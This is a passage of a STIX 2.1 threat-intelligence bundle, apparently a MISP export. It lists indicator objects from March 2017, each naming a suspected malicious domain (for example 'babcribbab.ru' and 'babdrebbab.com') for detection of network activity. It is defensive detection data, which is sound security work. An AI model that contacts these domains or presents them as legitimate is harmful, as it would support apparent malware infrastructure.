"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bdd-81a0-4aeb-a792-4b64950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babcrehbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bde-ce30-4ea5-8042-4e10950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babcribbab.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bde-9a04-4e95-b29a-4634950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babcrihbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bdf-65ec-405d-a64a-40aa950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babcrohbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6be0-5134-428a-b869-4954950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babcruhbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6be1-cb5c-4824-9ea2-4d30950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babcrulbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6be2-4abc-47e2-9deb-4371950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdabbab.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6be3-64d8-47f1-8be4-4631950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdabbab2.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6be4-2280-4087-909d-4ec8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdebbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6be5-958c-4db2-95c0-48e6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdebbab2.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6be6-c634-4054-9e8a-4fd2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdibbab2.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6be6-953c-4f9e-9ad3-443e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdihbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6be7-b094-4593-b8b1-44fe950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdobbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6be8-b5b8-49c5-96ec-40c9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdohbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6be9-e014-4633-a829-4bc6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdolbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bea-7320-4089-9b67-4bdc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdrabbab2.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6beb-0bcc-4d55-a445-412a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdrambab.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bec-c628-4bb8-9df0-4332950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdrebbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bec-7340-450b-9214-4825950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdrebbab2.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bed-1b30-4336-9a2d-484c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdrehbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bee-2c40-4d3e-a041-436d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdribbab.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bef-720c-4bb1-8f2e-4034950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdrihbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bf0-cbc0-4ef4-a703-410a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdrohbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bf1-f48c-4180-9997-4718950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdruhbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bf2-2060-47ed-a95e-4d82950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdrulbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bf3-9f3c-4580-a409-41f7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babdulbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bf3-70a4-4a80-b29a-4d57950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfabbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bf4-7a70-48c1-968d-4f2b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfabbab2.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bf5-d25c-4d13-8de2-44d0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfebbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bf6-2360-495b-9889-447b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfebbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bf7-0220-4397-a992-4aa9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfebbab2.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bf8-5d80-463a-92e7-4e30950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfibbab2.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bf9-15fc-44c2-b623-4c5d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babfihbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bf9-4988-409a-ae0d-4af8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babflabbab2.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6bfa-3758-458b-b71b-4bc1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babflambab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
